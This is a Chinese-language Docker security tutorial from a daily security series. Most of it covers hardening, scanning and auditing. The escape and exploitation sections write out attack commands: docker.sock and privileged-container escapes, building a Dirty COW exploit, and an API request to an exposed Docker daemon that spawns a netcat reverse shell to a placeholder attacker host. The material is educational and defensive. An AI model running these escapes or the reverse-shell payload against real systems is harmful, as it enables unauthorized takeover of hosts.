Day-064-Docker 安全实战

# Day 62: Docker 安全实战

> Web 安全系列第 32 天 | 预计阅读时间：40 分钟 | 难度：★★★★☆

---

## 清单 目录

1. [Docker 安全测试概述](#docker 安全测试概述)
2. [Docker 守护进程安全](#docker 守护进程安全)
3. [镜像安全测试](#镜像安全测试)
4. [容器配置安全](#容器配置安全)
5. [容器逃逸实战](#容器逃逸实战)
6. [Docker 网络安全](#docker 网络安全)
7. [Docker 漏洞利用](#docker 漏洞利用)
8. [安全加固实战](#安全加固实战)
9. [总结与思考](#总结与思考)
10. [参考资料](#参考资料)

---

## Docker 安全测试概述

### 测试目标

**安全测试目的**：
```
1. 发现安全漏洞
   - 配置错误
   - 镜像漏洞
   - 运行时风险

2. 评估风险
   - 漏洞影响
   - 利用难度
   - 业务影响

3. 提供修复建议
   - 技术方案
   - 优先级
   - 最佳实践
```

**测试范围**：
```
1. Docker 守护进程
   - 配置安全
   - API 安全
   - 网络监听

2. Docker 镜像
   - 漏洞扫描
   - 配置检查
   - 敏感信息

3. 容器运行时
   - 配置安全
   - 权限控制
   - 网络隔离

4. Docker 网络
   - 网络隔离
   - 端口暴露
   - 流量加密
```

### 测试工具

**扫描工具**：
```
Trivy:
- 镜像扫描
- 文件系统扫描
- CI/CD 集成

Docker Scan:
- 内置扫描
- 漏洞报告
- 修复建议

Clair:
- 静态分析
- 漏洞数据库
- API 接口
```

**审计工具**：
```
Docker Bench:
- 配置审计
- 最佳实践
- 合规检查

Popeye:
- 集群清理
- 配置检查
- 问题报告

Kubesec:
- 安全评分
- 配置检查
- 修复建议
```

---

## Docker 守护进程安全

### 守护进程配置

**风险配置**：
```
1. 暴露 Docker API
   -H tcp://0.0.0.0:2375
   无认证
   完全控制

2. 未启用 TLS
   - 明文通信
   - 凭证泄露
   - 中间人攻击

3. Socket 权限过大
   /var/run/docker.sock
   666 权限
   任意访问
```

**安全配置**：
```bash
# /etc/docker/daemon.json
{
  "tls": true,
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server.pem",
  "tlskey": "/etc/docker/server-key.pem",
  "hosts": ["tcp://0.0.0.0:2376"],
  "userns-remap": "default",
  "no-new-privileges": true,
  "live-restore": false
}
```

**审计检查**：
```bash
# 运行 Docker Bench
docker run --rm \
  --net host \
  --pid host \
  --userns host \
  --cap-add audit_control \
  -e DOCKER_CONTENT_TRUST=$DOCKER_CONTENT_TRUST \
  -v /etc:/etc:ro \
  -v /usr/bin/containerd:/usr/bin/containerd:ro \
  -v /usr/bin/runc:/usr/bin/runc:ro \
  -v /usr/lib/systemd:/usr/lib/systemd:ro \
  -v /var/lib:/var/lib:ro \
  -v /var/run/docker.sock:/var/run/docker.sock:ro \
  --rm \
  docker/docker-bench-security
```

### Docker Socket 保护

**Socket 风险**：
```
/var/run/docker.sock:
- Docker API 接口
- 完全控制 Docker
- 容器逃逸途径

风险：
- 未授权访问
- 容器逃逸
- 主机沦陷
```

**保护措施**：
```bash
# 限制 Socket 权限
chmod 660 /var/run/docker.sock
chown root:docker /var/run/docker.sock

# 不挂载到容器
# 避免 -v /var/run/docker.sock:/var/run/docker.sock

# 使用 TCP 替代
# 启用 TLS 认证
```

**检测 Socket 滥用**：
```bash
# 检查挂载 Socket 的容器
docker ps --format '{{.Names}}\t{{.Mounts}}' | grep docker.sock

# 检查 Socket 访问
auditctl -w /var/run/docker.sock -p rwxa -k docker_socket

# 查看审计日志
ausearch -k docker_socket
```

---

## 镜像安全测试

### 镜像漏洞扫描

**Trivy 扫描**：
```bash
# 扫描镜像
trivy image nginx:latest

# 输出格式
trivy image -f table nginx:latest
trivy image -f json nginx:latest

# 严重性过滤
trivy image --severity CRITICAL,HIGH nginx:latest

# CI/CD 集成
trivy image --exit-code 1 nginx:latest
```

**Docker Scan**：
```bash
# 扫描镜像
docker scan nginx:latest

# 输出格式
docker scan --json nginx:latest

# 查看修复建议
docker scan nginx:latest --file package.json
```

**漏洞分析**：
```
漏洞信息：
- CVE 编号
- 严重性
- 受影响版本
- 修复版本

修复建议：
- 更新基础镜像
- 更新依赖包
- 应用补丁
```

### 镜像配置检查

**敏感信息检测**：
```bash
# 检查历史层
docker history nginx:latest

# 检查环境变量
docker inspect nginx:latest | grep -i env

# 检查标签
docker inspect nginx:latest | grep -i label
```

**最佳实践检查**：
```dockerfile
# - 错误做法
FROM ubuntu:latest
RUN apt-get update && apt-get install -y nginx
ENV API_KEY=secret123
USER root
EXPOSE 22

# + 正确做法
FROM nginx:alpine
LABEL maintainer="team@example.com"
USER nginx
EXPOSE 80
HEALTHCHECK --interval=30s --timeout=3s \
  CMD curl -f http://localhost/ || exit 1
```

**镜像签名验证**：
```bash
# 启用 DCT
export DOCKER_CONTENT_TRUST=1

# 拉取签名镜像
docker pull nginx:latest

# 签名镜像
docker trust sign nginx:latest

# 查看签名
docker trust inspect nginx:latest
```

---

## 容器配置安全

### 安全选项

**运行选项**：
```bash
# 不运行特权容器
docker run --privileged=false ...

# 限制能力
docker run --cap-drop=ALL --cap-add=NET_BIND_SERVICE ...

# 只读根文件系统
docker run --read-only ...

# 临时文件系统
docker run --tmpfs /tmp ...

# 非 root 用户
docker run --user 1000:1000 ...
```

**资源限制**：
```bash
# CPU 限制
docker run --cpus="1.5" ...

# 内存限制
docker run --memory="512m" ...

# 磁盘限制
docker run --storage-opt size=1g ...

# 进程限制
docker run --pids-limit=100 ...
```

**安全选项**：
```bash
# Seccomp 配置文件
docker run --security-opt seccomp=/path/to/seccomp.json ...

# AppArmor 配置文件
docker run --security-opt apparmor=/path/to/apparmor ...

# 禁用新权限
docker run --security-opt no-new-privileges:true ...
```

### 配置审计

**检查运行容器**：
```bash
# 检查特权容器
docker ps --format '{{.Names}}\t{{.Privileged}}' | grep true

# 检查 root 运行
docker ps --format '{{.Names}}\t{{.User}}' | grep -E "root|$"

# 检查能力
docker inspect <container> | grep -i cap
```

**检查网络配置**：
```bash
# 检查端口暴露
docker ps --format '{{.Names}}\t{{.Ports}}'

# 检查网络模式
docker inspect <container> | grep -i networkmode

# 检查链接
docker inspect <container> | grep -i links
```

---

## 容器逃逸实战

### 逃逸技术

**Docker Socket 逃逸**：
```bash
# 如果容器挂载了 Docker Socket
# 可以控制宿主机 Docker

# 创建特权容器
docker run -it --rm \
  -v /var/run/docker.sock:/var/run/docker.sock \
  docker:latest \
  docker run -it --rm -v /:/host alpine chroot /host

# 访问宿主机文件系统
chroot /host
```

**特权容器逃逸**：
```bash
# 特权容器有所有能力
# 可以访问宿主机设备

# 挂载宿主机磁盘
docker run --privileged -it alpine \
  sh -c "mkdir /host; mount /dev/sda1 /host; chroot /host"

# 访问宿主机
chroot /host
```

**内核漏洞逃逸**：
```bash
# Dirty COW (CVE-2016-5195)
# Overlay2 漏洞
# 其他内核漏洞

# 编译 exploit
gcc -pthread dirty.c -o dirty

# 执行 exploit
./dirty
```

### 逃逸检测

**异常行为检测**：
```bash
# 检查容器进程
docker top <container>

# 检查容器网络
docker exec <container> netstat -an

# 检查容器文件系统
docker exec <container> ls -la /

# 检查敏感挂载
docker inspect <container> | grep -i mount
```

**Falco 规则**：
```yaml
- rule: Container Escaped
  desc: Detect container escape
  condition: >
    spawned_process and container
    and (proc.name = "chroot" or proc.name = "nsenter")
  output: "Container escape detected (container=%container.id)"
  priority: CRITICAL
```

---

## Docker 网络安全

### 网络隔离

**网络类型**：
```bash
# Bridge 网络（默认）
docker network create bridge-network

# Host 网络（共享主机）
docker run --net host ...

# None 网络（无网络）
docker run --net none ...

# Overlay 网络（跨主机）
docker network create -d overlay overlay-network
```

**网络隔离最佳实践**：
```bash
# 创建专用网络
docker network create app-network

# 连接容器到专用网络
docker run --net app-network ...

# 不暴露不必要端口
docker run -p 127.0.0.1:8080:80 ...
```

### 端口安全

**端口暴露风险**：
```
-p 80:80
- 所有接口监听
- 防火墙需配置
- 攻击面增加

-p 127.0.0.1:80:80
- 仅本地监听
- 更安全
- 需反向代理
```

**安全配置**：
```bash
# 仅本地监听
docker run -p 127.0.0.1:8080:80 ...

# 使用反向代理
# Nginx/Traefik 代理

# 防火墙限制
iptables -A INPUT -p tcp --dport 8080 -s 10.0.0.0/8 -j ACCEPT
iptables -A INPUT -p tcp --dport 8080 -j DROP
```

---

## Docker 漏洞利用

### 常见漏洞

**未授权 API 访问**：
```bash
# 发现暴露的 Docker API
nmap -p 2375 target

# 列出容器
curl http://target:2375/containers/json

# 创建容器
curl -X POST http://target:2375/containers/create \
  -H "Content-Type: application/json" \
  -d '{"Image":"alpine","Cmd":["nc","-e","/bin/sh","attacker","4444"]}'

# 启动容器
curl -X POST http://target:2375/containers/<id>/start
```

**容器提权**：
```bash
# 检查 SUID 文件
docker exec <container> find / -perm -4000 2>/dev/null

# 检查能力
docker exec <container> getcap -r /

# 利用 SUID/能力提权
docker exec <container> /usr/bin/find . -exec /bin/sh -c 'whoami' \;
```

### 攻击链

**完整攻击链**：
```
1. 发现暴露 API
   nmap -p 2375 target

2. 访问 API
   curl http://target:2375/version

3. 创建恶意容器
   curl -X POST http://target:2375/containers/create ...

4. 挂载宿主机
   -v /:/host

5. 执行命令
   chroot /host
   # 完全控制宿主机
```

---

## 安全加固实战

### 加固检查清单

**守护进程加固**：
```
□ 启用 TLS
□ 限制网络监听
□ 启用用户命名空间
□ 配置日志驱动
□ 启用实时恢复
□ 配置存储驱动
```

**镜像加固**：
```
□ 使用官方镜像
□ 扫描漏洞
□ 签名镜像
□ 不存储秘密
□ 使用非 root 用户
□ 最小化基础
```

**容器加固**：
```
□ 不运行特权
□ 限制能力
□ 只读根文件系统
□ 限制资源
□ 配置安全选项
□ 健康检查
```

### 自动化加固

**Docker Compose 安全配置**：
```yaml
version: '3.8'
services:
  app:
    image: myapp:latest
    user: "1000:1000"
    read_only: true
    tmpfs:
      - /tmp
      - /var/run
    cap_drop:
      - ALL
    cap_add:
      - NET_BIND_SERVICE
    security_opt:
      - no-new-privileges:true
    networks:
      - app-network
    deploy:
      resources:
        limits:
          cpus: '1'
          memory: 512M

networks:
  app-network:
    driver: bridge
```

**Kubernetes 安全配置**：
```yaml
apiVersion: v1
kind: Pod
metadata:
  name: secure-pod
spec:
  securityContext:
    runAsNonRoot: true
    runAsUser: 1000
  containers:
  - name: app
    image: myapp:latest
    securityContext:
      allowPrivilegeEscalation: false
      readOnlyRootFilesystem: true
      capabilities:
        drop:
        - ALL
    resources:
      limits:
        cpu: "1"
        memory: "512Mi"
```

---

## 总结与思考

### 核心要点回顾

1. **守护进程安全**
   - TLS 加密
   - API 保护
   - Socket 保护

2. **镜像安全**
   - 漏洞扫描
   - 签名验证
   - 最佳实践

3. **运行时安全**
   - 配置加固
   - 权限限制
   - 网络隔离

### 深入思考问题

1. **无服务器容器**？
   - Fargate
   - Cloud Run
   - 安全影响

2. **Rootless Docker**？
   - 无需 root
   - 用户命名空间
   - 安全提升

3. **容器不可变**？
   - 不可变基础设施
   - 自动替换
   - 安全优势

### 实战建议

**开发人员**：
1. 安全镜像构建
2. 漏洞扫描
3. 安全配置
4. 最小权限

**安全人员**：
1. 持续监控
2. 漏洞管理
3. 配置审计
4. 事件响应

**运维人员**：
1. 安全加固
2. 补丁管理
3. 备份恢复
4. 性能优化

---

## 参考资料

### 学习资源
- [Docker Security Documentation](https://docs.docker.com/engine/security/)
- [Docker Bench for Security](https://github.com/docker/docker-bench-security)
- [OWASP Docker Security](https://owasp.org/www-project-docker-security/)

### 工具资源
- [Trivy](https://github.com/aquasecurity/trivy)
- [Docker Scan](https://docs.docker.com/scan/)
- [Falco](https://falco.org/)
- [Clair](https://github.com/quay/clair)

### 书籍推荐
- 《Docker 安全实战》
- 《Container Security》
- 《Docker 安全指南》
- 《Cloud Native Security》

### 在线资源
- [CIS Docker Benchmark](https://www.cisecurity.org/benchmark/docker/)
- [Awesome Docker Security](https://github.com/veggiemonk/awesome-docker#security)
- [Docker Security Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html)

---

**标记 明日预告**：Day 63 - Kubernetes 安全实战

> 本文内容仅供学习和研究使用，请勿用于非法目的。所有实验请在隔离环境中进行。

---

*本文是 365 天信息安全技术系列的第 62 篇，Web 安全部分第 32 篇，精编版本*